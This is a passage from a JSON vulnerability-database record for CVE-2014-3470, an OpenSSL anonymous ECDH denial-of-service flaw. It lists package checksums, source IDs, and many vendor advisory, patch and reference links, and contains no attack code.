mes5/i586/libopenssl0.9.8-devel-0.9.8h-3.18mdvmes5.2.i586.rpm\n 0cc60393474d11a3786965d780e39ebc mes5/i586/libopenssl0.9.8-static-devel-0.9.8h-3.18mdvmes5.2.i586.rpm\n 16d367fe394b2f16b9f022ea7ba75a54 mes5/i586/openssl-0.9.8h-3.18mdvmes5.2.i586.rpm \n 223a4a6b80f1b2eb3cbfaf99473423f3 mes5/SRPMS/openssl-0.9.8h-3.18mdvmes5.2.src.rpm\n\n Mandriva Enterprise Server 5/X86_64:\n 85a51b41a45f6905ea778347d8b236c1 mes5/x86_64/lib64openssl0.9.8-0.9.8h-3.18mdvmes5.2.x86_64.rpm\n d0bf9ef6c6e33d0c6158add14cbe04b8 mes5/x86_64/lib64openssl0.9.8-devel-0.9.8h-3.18mdvmes5.2.x86_64.rpm\n 707842b93162409157667f696996f4fc mes5/x86_64/lib64openssl0.9.8-static-devel-0.9.8h-3.18mdvmes5.2.x86_64.rpm\n 70f4de1608d99c970afa1786595a761d mes5/x86_64/openssl-0.9.8h-3.18mdvmes5.2.x86_64.rpm \n 223a4a6b80f1b2eb3cbfaf99473423f3 mes5/SRPMS/openssl-0.9.8h-3.18mdvmes5.2.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security", "sources": [ { "db": "NVD", "id": "CVE-2014-3470" }, { "db": "JVNDB", "id": "JVNDB-2014-002767" }, { "db": "BID", "id": "67898" }, { "db": "VULMON", "id": "CVE-2014-3470" }, { "db": "PACKETSTORM", "id": "127362" }, { "db": "PACKETSTORM", "id": "127213" }, { "db": "PACKETSTORM", "id": "127266" }, { "db": "PACKETSTORM", "id": "127923" }, { "db": "PACKETSTORM", "id": "126976" }, { "db": "PACKETSTORM", "id": "127807" }, { "db": "PACKETSTORM", "id": "127080" }, { "db": "PACKETSTORM", "id": "127016" }, { "db": "PACKETSTORM", "id": "127265" }, { "db": "PACKETSTORM", "id": "126925" } ], "trust": 2.88 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-3470", "trust": 3.8 }, { "db": "MCAFEE", "id": "SB10075", "trust": 2.0 }, { "db": "BID", "id": "67898", "trust": 2.0 }, { "db": "JUNIPER", "id": "JSA10629", "trust": 2.0 }, { "db": "SECUNIA", "id": "59916", "trust": 1.7 }, { "db": "SECUNIA", "id": "58742", "trust": 1.7 }, { "db": "SECUNIA", "id": "59659", "trust": 1.7 }, { "db": "SECUNIA", "id": "58977", "trust": 1.7 }, { "db": "SECUNIA", "id": "59310", "trust": 1.7 }, { "db": "SECUNIA", "id": "59191", "trust": 1.7 }, { "db": "SECUNIA", "id": "59483", "trust": 1.7 }, { "db": "SECUNIA", "id": "59189", "trust": 1.7 }, { "db": "SECUNIA", "id": "59721", "trust": 1.7 }, { "db": "SECUNIA", "id": "59431", "trust": 1.7 }, { "db": "SECUNIA", "id": "59282", "trust": 1.7 }, { "db": "SECUNIA", "id": "59362", "trust": 1.7 }, { "db": "SECUNIA", "id": "59491", "trust": 1.7 }, { "db": "SECUNIA", "id": "59300", "trust": 1.7 }, { "db": "SECUNIA", "id": "60571", "trust": 1.7 }, { "db": "SECUNIA", "id": "59287", "trust": 1.7 }, { "db": "SECUNIA", "id": "58939", "trust": 1.7 }, { "db": "SECUNIA", "id": "58337", "trust": 1.7 }, { "db": "SECUNIA", "id": "59162", "trust": 1.7 }, { "db": "SECUNIA", "id": "59364", "trust": 1.7 }, { "db": "SECUNIA", "id": "59449", "trust": 1.7 }, { "db": "SECUNIA", "id": "59192", "trust": 1.7 }, { "db": "SECUNIA", "id": "59990", "trust": 1.7 }, { "db": "SECUNIA", "id": "59167", "trust": 1.7 }, { "db": "SECUNIA", "id": "58945", "trust": 1.7 }, { "db": "SECUNIA", "id": "59126", "trust": 1.7 }, { "db": "SECUNIA", "id": "58716", "trust": 1.7 }, { "db": "SECUNIA", "id": "61254", "trust": 1.7 }, { "db": "SECUNIA", "id": "59175", "trust": 1.7 }, { "db": "SECUNIA", "id": "59442", "trust": 1.7 }, { "db": "SECUNIA", "id": "59655", "trust": 1.7 }, { "db": "SECUNIA", "id": "59459", "trust": 1.7 }, { "db": "SECUNIA", "id": "59445", "trust": 1.7 }, { "db": "SECUNIA", "id": "59451", "trust": 1.7 }, { "db": "SECUNIA", "id": "59264", "trust": 1.7 }, { "db": "SECUNIA", "id": "59306", "trust": 1.7 }, { "db": "SECUNIA", "id": "58579", "trust": 1.7 }, { "db": "SECUNIA", "id": "59518", "trust": 1.7 }, { "db": "SECUNIA", "id": "59490", "trust": 1.7 }, { "db": "SECUNIA", "id": "59440", "trust": 1.7 }, { "db": "SECUNIA", "id": "59120", "trust": 1.7 }, { "db": "SECUNIA", "id": "59666", "trust": 1.7 }, { "db": "SECUNIA", "id": "59514", "trust": 1.7 }, { "db": "SECUNIA", "id": "59784", "trust": 1.7 }, { "db": "SECUNIA", "id": "58615", "trust": 1.7 }, { "db": "SECUNIA", "id": "59460", "trust": 1.7 }, { "db": "SECUNIA", "id": "59284", "trust": 1.7 }, { "db": "SECUNIA", "id": "59495", "trust": 1.7 }, { "db": "SECUNIA", "id": "59413", "trust": 1.7 }, { "db": "SECUNIA", "id": "58713", "trust": 1.7 }, { "db": "SECUNIA", "id": "58714", "trust": 1.7 }, { "db": "SECUNIA", "id": "59365", "trust": 1.7 }, { "db": "SECUNIA", "id": "59438", "trust": 1.7 }, { "db": "SECUNIA", "id": "59223", "trust": 1.7 }, { "db": "SECUNIA", "id": "59441", "trust": 1.7 }, { "db": "SECUNIA", "id": "59525", "trust": 1.7 }, { "db": "SECUNIA", "id": "58797", "trust": 1.7 }, { "db": "SECUNIA", "id": "59301", "trust": 1.7 }, { "db": "SECUNIA", "id": "59450", "trust": 1.7 }, { "db": "SECUNIA", "id": "59340", "trust": 1.7 }, { "db": "SECUNIA", "id": "59895", "trust": 1.7 }, { "db": "SECUNIA", "id": "59342", "trust": 1.7 }, { "db": "SECUNIA", "id": "59669", "trust": 1.7 }, { "db": "SECUNIA", "id": "59437", "trust": 1.7 }, { "db": "SECUNIA", "id": "58667", "trust": 1.7 }, { "db": "SIEMENS", "id": "SSA-234763", "trust": 1.7 }, { "db": "ICS CERT", "id": "ICSA-14-198-03", "trust": 1.1 }, { "db": "JVN", "id": "JVNVU93868849", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2014-002767", "trust": 0.8 }, { "db": "AUSCERT", "id": "ESB-2022.0696", "trust": 0.6 }, { "db": "LENOVO", "id": "LEN-24443", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-201406-081", "trust": 0.6 }, { "db": "ICS CERT", "id": "ICSA-14-198-03G", "trust": 0.4 }, { "db": "DLINK", "id": "SAP10045", "trust": 0.3 }, { "db": "ICS CERT", "id": "ICSA-17-094-04", "trust": 0.3 }, { "db": "ICS CERT", "id": "ICSA-14-198-03F", "trust": 0.3 }, { "db": "ICS CERT", "id": "ICSA-14-198-03B", "trust": 0.3 }, { "db": "ICS CERT", "id": "ICSA-14-198-03C", "trust": 0.3 }, { "db": "ICS CERT", "id": "ICSA-14-198-03D", "trust": 0.3 }, { "db": "VULMON", "id": "CVE-2014-3470", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127362", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127213", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127266", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127923", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126976", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127807", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127080", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127016", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127265", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "126925", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-3470" }, { "db": "BID", "id": "67898" }, { "db": "JVNDB", "id": "JVNDB-2014-002767" }, { "db": "PACKETSTORM", "id": "127362" }, { "db": "PACKETSTORM", "id": "127213" }, { "db": "PACKETSTORM", "id": "127266" }, { "db": "PACKETSTORM", "id": "127923" }, { "db": "PACKETSTORM", "id": "126976" }, { "db": "PACKETSTORM", "id": "127807" }, { "db": "PACKETSTORM", "id": "127080" }, { "db": "PACKETSTORM", "id": "127016" }, { "db": "PACKETSTORM", "id": "127265" }, { "db": "PACKETSTORM", "id": "126925" }, { "db": "CNNVD", "id": "CNNVD-201406-081" }, { "db": "NVD", "id": "CVE-2014-3470" } ] }, "id": "VAR-201406-0117", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41201043363636364 }, "last_update_date": "2024-06-13T23:00:33.950000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "HT6443", "trust": 0.8, "url": "http://support.apple.com/kb/ht6443" }, { "title": "HT6443", "trust": 0.8, "url": "http://support.apple.com/kb/ht6443?viewlocale=ja_jp" }, { "title": "KB36051", "trust": 0.8, "url": "http://www.blackberry.com/btsc/kb36051" }, { "title": "cisco-sa-20140605-openssl", "trust": 0.8, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20140605-openssl" }, { "title": "\u30c8\u30c3\u30d7\u30da\u30fc\u30b8", "trust": 0.8, "url": "http://fedoraproject.org/ja/" }, { "title": "HIRT-PUB14010", "trust": 0.8, "url": "http://www.hitachi.co.jp/hirt/publications/hirt-pub14010/index.html" }, { "title": "6060", "trust": 0.8, "url": "http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=18\u0026id=6060\u0026myns=phmc\u0026mync=e" }, { "title": "6061", "trust": 0.8, "url": "http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=18\u0026id=6061\u0026myns=phmc\u0026mync=e" }, { "title": "1676062", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676062" }, { "title": "4037761", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037761" }, { "title": "1676419", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676419" }, { "title": "1676128", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676128" }, { "title": "1676496", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676496" }, { "title": "1676655", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676655" }, { "title": "00001841", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg400001841" }, { "title": "1677695", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677695" }, { "title": "00001843", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg400001843" }, { "title": "1677828", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677828" }, { "title": "1673137", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673137" }, { "title": "1678167", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678167" }, { "title": "1676035", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676035" }, { "title": "1678289", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678289" }, { "title": "2079783", "trust": 0.8, "url": "http://kb.vmware.com/selfservice/microsites/search.do?language=en_us\u0026cmd=displaykc\u0026externalid=2079783" }, { "title": "7015264", "trust": 0.8, "url": "http://www.novell.com/support/kb/doc.php?id=7015264" }, { "title": "7015300", "trust": 0.8, "url": "http://www.novell.com/support/kb/doc.php?id=7015300" }, { "title": "SB10075", "trust": 0.8, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10075" }, { "title": "Fix CVE-2014-3470", "trust": 0.8, "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commit;h=8011cd56e39a433b1837465259a9bd24a38727fb" }, { "title": "Anonymous ECDH denial of service (CVE-2014-3470)", "trust": 0.8, "url": "http://www.openssl.org/news/secadv_20140605.txt" }, { "title": "Oracle Critical Patch Update Advisory - July 2014", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html" }, { "title": "Text Form of Oracle Critical Patch Update - July 2014 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2014verbose-1972958.html" }, { "title": "Oracle Critical Patch Update Advisory - January 2015", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html" }, { "title": "Text Form of Oracle Critical Patch Update - January 2015 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujan2015verbose-1972976.html" }, { "title": "Bug 1103600", "trust": 0.8, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1103600" }, { "title": "SA80", "trust": 0.8, "url": "https://kb.bluecoat.com/index?page=content\u0026id=sa80" }, { "title": "Huawei-SA-20140613-OpenSSL", "trust": 0.8, "url": "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-345106.htm" }, { "title": "January 2015 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/january_2015_critical_patch_update" }, { "title": "CVE-2014-3470 Denial of Service(DOS) vulnerability in OpenSSL", "trust": 0.8, "url": "https://blogs.oracle.com/sunsecurity/entry/cve_2014_3470_denial_of" }, { "title": "Splunk Enterprise 6.1.2, 6.0.5 and 5.0.9 address two vulnerabilities - July 1, 2014", "trust": 0.8, "url": "http://www.splunk.com/view/sp-caaam2d" }, { "title": "TLSA-2014-6", "trust": 0.8, "url": "http://www.turbolinux.co.jp/security/2014/tlsa-2014-6j.html" }, { "title": "VMSA-2014-0006", "trust": 0.8, "url": "http://www.vmware.com/security/advisories/vmsa-2014-0006.html" }, { "title": "34549", "trust": 0.8, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=34549" }, { "title": "OpenSSL\u306e\u8106\u5f31\u6027(CVE-2014-0224\u4ed6)\u306b\u3088\u308b\u30c6\u30fc\u30d7\u30e9\u30a4\u30d6\u30e9\u30ea\u88c5\u7f6e\u3078\u306e\u5f71\u97ff\u306b\u3064\u3044\u3066", "trust": 0.8, "url": "http://www.hitachi.co.jp/products/it/server/security/info/vulnerable/openssl_cve20140224_tape_library.html" }, { "title": "cisco-sa-20140605-openssl", "trust": 0.8, "url": "http://www.cisco.com/cisco/web/support/jp/112/1122/1122700_cisco-sa-20140605-openssl-j.html" }, { "title": "Symfoware Server: OpenSSL\u306e\u8106\u5f31\u6027(CVE-2014-0224, CVE-2014-0221, CVE-2014-0195, CVE-2014-3470)(2014\u5e747\u670815\u65e5)", "trust": 0.8, "url": "http://software.fujitsu.com/jp/security/products-fujitsu/solution/symfoware_201404.html" }, { "title": "openssl-1.0.1h", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51081" }, { "title": "openssl-1.0.0m", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51080" }, { "title": "openssl-0.9.8za", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=51079" }, { "title": "The Register", "trust": 0.2, "url": "https://www.theregister.co.uk/2014/07/10/fireeye_patches_os_torpedo_exploitdb_disclosure/" }, { "title": "Siemens Security Advisories: Siemens Security Advisory", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=b92b65104373bc8476811ff1b99cd369" }, { "title": "Red Hat: CVE-2014-3470", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2014-3470" }, { "title": "Ubuntu Security Notice: openssl regression", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2232-3" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2232-4" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2232-1" }, { "title": "Ubuntu Security Notice: openssl regression", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2232-2" }, { "title": "Debian Security Advisories: DSA-2950-1 openssl -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=909292f2afe623fbec51f7ab6b32f790" }, { "title": "Debian CVElist Bug Report Logs: openssl: CVE-2014-0224, CVE-2014-0221, CVE-2014-0195, CVE-2014-0198, CVE-2010-5298, CVE-2014-3470", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=07d14df4883f21063a053cea8d2239c6" }, { "title": "Amazon Linux AMI: ALAS-2014-349", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2014-349" }, { "title": "Debian CVElist Bug Report Logs: virtualbox: CVE-2014-6588 CVE-2014-6589 CVE-2014-6590 CVE-2014-6595 CVE-2015-0418 CVE-2015-0427", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=eee4d8c3e2b11de5b15ee65d96af6c60" }, { "title": "Symantec Security Advisories: SA80 : OpenSSL Security Advisory 05-Jun-2014", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=dd4667746d163d08265dfdd4c98e4201" }, { "title": "Citrix Security Bulletins: Citrix Security Advisory for OpenSSL Vulnerabilities (June 2014)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=citrix_security_bulletins\u0026qid=afbd3a710e98424e558b1b21482abad6" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - January 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=4a692d6d60aa31507cb101702b494c51" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=523d3f220a64ff01dd95e064bd37566a" }, { "title": "", "trust": 0.1, "url": "https://github.com/live-hack-cve/cve-2014-3470 " }, { "title": "", "trust": 0.1, "url": "https://github.com/potterxma/linux-deployment-standard " }, { "title": "", "trust": 0.1, "url": "https://github.com/hrbrmstr/internetdb " } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-3470" }, { "db": "JVNDB", "id": "JVNDB-2014-002767" }, { "db": "CNNVD", "id": "CNNVD-201406-081" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-476", "trust": 1.0 }, { "problemtype": "CWE-Other", "trust": 0.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-002767" }, { "db": "NVD", "id": "CVE-2014-3470" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.6, "url": "http://support.citrix.com/article/ctx140876" }, { "trust": 2.3, "url": "http://www.openssl.org/news/secadv_20140605.txt" }, { "trust": 2.3, "url": "http://www.securityfocus.com/bid/67898" }, { "trust": 2.3, "url": "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-345106.htm" }, { "trust": 2.3, "url": "http://www.vmware.com/security/advisories/vmsa-2014-0012.html" }, { "trust": 2.3, "url": "http://www.vmware.com/security/advisories/vmsa-2014-0006.html" }, { "trust": 2.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg24037783" }, { "trust": 2.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21676793" }, { "trust": 2.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21676356" }, { "trust": 2.0, "url": "https://kb.bluecoat.com/index?page=content\u0026id=sa80" }, { "trust": 2.0, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20140605-openssl" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676035" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677695" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676655" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677828" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676062" }, { "trust": 2.0, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10075" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676496" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676419" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678167" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673137" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21683332" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677836" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676879" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676615" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676529" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676501" }, { "trust": 2.0, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095754" }, { "trust": 2.0, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095755" }, { "trust": 2.0, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095756" }, { "trust": 2.0, "url": "http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095757" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676071" }, { "trust": 2.0, "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory9.asc" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675821" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675626" }, { "trust": 2.0, "url": "http://www.f-secure.com/en/web/labs_global/fsc-2014-6" }, { "trust": 2.0, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/300/sol15342.html" }, { "trust": 1.7, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1103600" }, { "trust": 1.7, "url": "http://secunia.com/advisories/58797" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59191" }, { "trust": 1.7, "url": "http://secunia.com/advisories/58579" }, { "trust": 1.7, "url": "http://www.blackberry.com/btsc/kb36051" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59438" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59301" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59450" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59491" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59721" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59655" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59659" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59162" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59120" }, { "trust": 1.7, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678289" }, { "trust": 1.7, "url": "http://secunia.com/advisories/58939" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59666" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59126" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59490" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59442" }, { "trust": 1.7, "url": "http://www.novell.com/support/kb/doc.php?id=7015300" }, { "trust": 1.7, "url": "http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=18\u0026id=6060\u0026myns=phmc\u0026mync=e" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59514" }, { "trust": 1.7, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677527" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59495" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59669" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59413" }, { "trust": 1.7, "url": "http://www.novell.com/support/kb/doc.php?id=7015264" }, { "trust": 1.7, "url": "http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=18\u0026id=6061\u0026myns=phmc\u0026mync=e" }, { "trust": 1.7, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037761" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59300" }, { "trust": 1.7, "url": "http://www.splunk.com/view/sp-caaam2d" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59895" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59459" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59451" }, { "trust": 1.7, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg400001843" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59342" }, { "trust": 1.7, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg400001841" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59916" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59990" }, { "trust": 1.7, "url": "http://secunia.com/advisories/60571" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59784" }, { "trust": 1.7, "url": "http://support.apple.com/kb/ht6443" }, { "trust": 1.7, "url": "http://seclists.org/fulldisclosure/2014/dec/23" }, { "trust": 1.7, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676889" }, { "trust": 1.7, "url": "https://www.novell.com/support/kb/doc.php?id=7015271" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-04/msg00016.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00011.html" }, { "trust": 1.7, "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05301946" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=140752315422991\u0026w=2" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=140389355508263\u0026w=2" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=140904544427729\u0026w=2" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=140317760000786\u0026w=2" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=140389274407904\u0026w=2" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=140482916501310\u0026w=2" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=140621259019789\u0026w=2" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=140491231331543\u0026w=2" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=140448122410568\u0026w=2" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=140266410314613\u0026w=2" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=140499827729550\u0026w=2" }, { "trust": 1.7, "url": "http://marc.info/?l=bugtraq\u0026m=140431828824371\u0026w=2" }, { "trust": 1.7, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:062" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-03/msg00027.html" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59365" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59364" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59362" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59340" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59310" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59306" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59287" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59284" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59282" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59264" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59223" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59192" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59189" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59175" }, { "trust": 1.7, "url": "http://secunia.com/advisories/59167" }, { "trust": 1.7, "url": "http://secunia.com/advisories/58977" }, { "trust": 1.7, "url": "http://secunia.com/advisories/58945" }, { "trust": 1.7, "url": "http://secunia.com/advisories/58742" }, { "trust": 